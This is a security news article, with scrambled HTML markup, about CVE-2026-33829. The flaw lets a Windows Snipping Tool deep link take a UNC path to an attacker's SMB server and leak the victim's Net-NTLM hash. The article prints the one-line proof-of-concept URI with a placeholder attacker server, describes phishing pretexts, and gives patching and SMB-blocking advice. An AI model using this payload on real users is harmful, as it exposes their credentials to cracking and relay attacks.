A proof-of-concept (PoC) exploit has been publicly released for a newly disclosed vulnerability in Microsoft\u2019s Snipping Tool that allows attackers to silently steal users\u2019 Net-NTLM credential hashes by luring them to a malicious webpage.<\/p>\n
Tracked as CVE-2026-33829, the flaw resides in how Windows Snipping Tool handles deep link URI registrations<\/a> using the Due to a lack of proper input validation, an attacker can supply a UNC path pointing to a remote, attacker-controlled SMB server, coercing an authenticated SMB connection and capturing the victim\u2019s Net-NTLM hash in the process.<\/p>\n The vulnerability was discovered and reported by security researchers at Black Arrow, who coordinated disclosure with Microsoft prior to going public.<\/p>\n Exploitation requires minimal technical sophistication. An attacker simply needs to host a malicious URL \u2014 or an HTML page that auto-triggers the deep link and convince the target to visit it. The PoC from Black Arrow Security demonstrates<\/a> the attack with a single browser-triggered URI:<\/p>\n When a victim opens this link, Snipping Tool launches and silently attempts to load the remote resource over SMB. During this connection attempt, Windows automatically transmits the user\u2019s Net-NTLM authentication response to the attacker\u2019s server, exposing credentials that can then be cracked offline or used in NTLM relay attacks against internal network resources.<\/p>\n What makes CVE-2026-33829 particularly dangerous is how naturally it lends itself to social engineering campaigns<\/a>. Because the Snipping Tool actually opens during exploitation, the attack is visually consistent with believable pretexts such as asking an employee to crop a corporate wallpaper, edit a badge photo, or review an HR document.<\/p>\n An attacker could register a domain like The victim sees nothing unusual; the Snipping Tool opens as expected while NTLM authentication<\/a> occurs transparently in the background.<\/p>\n This attack vector is especially effective in corporate environments where phishing emails referencing internal HR portals, IT helpdesks, or shared document systems are common.<\/p>\n Microsoft addressed the vulnerability in its April 14, 2026, Patch Tuesday security update<\/a>. The disclosure timeline is as follows:<\/p>\n Organizations and individual users running affected versions of the Windows Snipping Tool should immediately apply the April 14, 2026, security update.<\/p>\n Security teams should also monitor internal networks for unexpected outbound SMB connections (port 445) to external or unknown hosts, which could indicate active exploitation attempts. Blocking outbound SMB traffic at the network perimeter remains a strong defensive measure regardless of patch status.<\/p>\n Follow us on Google News<\/a>, LinkedIn<\/a>, and X<\/a> for daily cybersecurity updates. Contact us<\/a> to feature your stories.<\/strong><\/p>\n The post PoC Exploit Released for Windows Snipping Tool NTLM Hash Leak Vulnerability<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\nms-screensketch<\/code> protocol schema. Affected versions of the application register this deep link, which accepts a filePath<\/code> parameter.<\/p>\nWindows Snipping Tool PoC<\/strong><\/h2>\n
text
ms-screensketch:edit?&filePath=\\<attacker-smb-server>file.png&isTemporary=false&saved=true&source=Toast<\/code><\/pre>\n![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhJzHfTiqMx3F63jt8ahcD8pQVPXP8C6RWMoIGGxJfaq8To2mdVx_n5-ZLjS0lghz1VmoYGXD_p2jxCBdTsTxM-DpjuYDxgUdR5OcmAAXj4_lzerB-weik_x60i1ITyL4g5LsjgC4zpWVD8BQxqWpX90FuUlJdUL2Z0YjyuAZNAYivjtMXpkagI5AemfoH_\/s16000\/Snipping%2520PoC.webp?ssl=1\")
<\/figure>\nsnip.example.com<\/code> and serve a convincing image URL that silently delivers the malicious deep link payload behind the scenes.<\/p>\nPatch Availability and Timeline<\/strong><\/h2>\n
\n